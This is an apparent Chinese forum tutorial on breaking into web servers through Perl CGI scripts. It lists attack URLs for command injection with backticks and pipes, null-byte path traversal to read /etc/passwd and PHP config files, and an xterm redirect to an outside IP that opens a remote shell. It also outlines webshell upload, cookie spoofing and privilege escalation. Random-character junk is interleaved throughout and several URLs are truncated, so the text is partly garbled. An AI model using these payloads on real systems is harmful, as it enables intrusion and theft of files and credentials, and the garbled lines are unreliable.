总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着
3 [$ ~" y' @+ R' I- \- i# scookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权
1 J4 q | O/ n7 c2 ^感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们
% g3 a& D5 S( o' X) `注“
7 z5 O; x% B% @! o& Q( K( C& iperl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。 , H& U: b- I, g# a
以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET
* E+ {8 L: c0 g D4 X. J, s. E
# [; A* A$ H0 Lhttp://target.com/cgi-bin/home/news/sub.pl?12 随意构造 8 Z: F( b" U3 s- ]* a
http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢
" o" `' @; n1 Q# K9 F, qhttp://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号
) F' \0 Q. C9 Lhttp://target.com/cgi-bin/home/news/sub.pl?`id` / y: m# d1 [: B/ U! q
http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`
$ V' @/ v$ M2 Zhttp://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示 & S! v* e7 F" l5 `7 |/ _
" m5 P' @1 l7 F* A/ Rhttp://target.com/test.pl;ls|
+ ]( I4 S0 l$ H2 r, Xhttp://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| 1 P7 J+ N: J9 d5 K' f& k
http://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26| 2 S; d( h* L4 ?8 g7 Q% {* b' `
http://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造 " |+ n, z' ~3 p- u# i
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。
3 P3 E% t1 F# ^" T% Fhttp://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection
. i' h8 q5 U) ]9 P0 J) l
( ^$ K1 r" ^' rhttp://target.com/test.pl?&........ /../../etc/passwd , X* n; T1 v! C- @- S
4 N; Z! T7 X& k, N- W1 V; V/ |
http://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./
" o5 x$ l7 b( @$ L2 r. J% X& Mhttp://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了 2 w2 d! t$ _6 B0 _
http://www.target.org/cgi-bin/cl ... ../../etc/passwd%00
0 X5 Q" Z1 D, ]1 s5 d! e0 a4 r4 [8 P6 V+ F
http://www.target.org/show.php?f ... /include/config.php 查看php代码
, j9 v6 C# S$ }; Z- b% zhttp://www.target.org/show.php?f ... ng/admin/global.php
, g" Y3 E( c. e7 @! j5 `! u- e. r2 ~& [& D6 m0 Y- u$ E1 w
emm和ps的一句话- a4 X n: [4 D. Z% \; \: E$ s
7 v# I9 S7 F, }4 |( u* Ohttp://www.target.org/cgi-bin/cl ... /../../../bin/ls%20 9 H& Q1 D) n. k* | U* u; B3 v
" L+ M5 l; t" ^/ D0 W1 j W>bbb%20|
! p$ z: U. c3 U# F% f( `6 |0 ?1 f5 p6 `
http://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串 % _/ d3 H' ]) _& t
9 u1 c6 C# N( q+ i! ]5 [http://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征 % \: c2 i% _, b9 @7 B! V0 n* _6 s
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin
: ~# j9 a8 y* |# ^+ i3 J7 \) A. x! O' R$ a0 @5 Q8 G
相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法
1 |* `' i+ d) @; |4 Ghttp://target.com/index.html#cmd.exe
/ @- n% d2 b. uhttp://target.com/index.html?dummyparam=xp_cmdshell
8 z) Y% a5 y0 \lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd
7 T# }% m# Z. L8 N- f |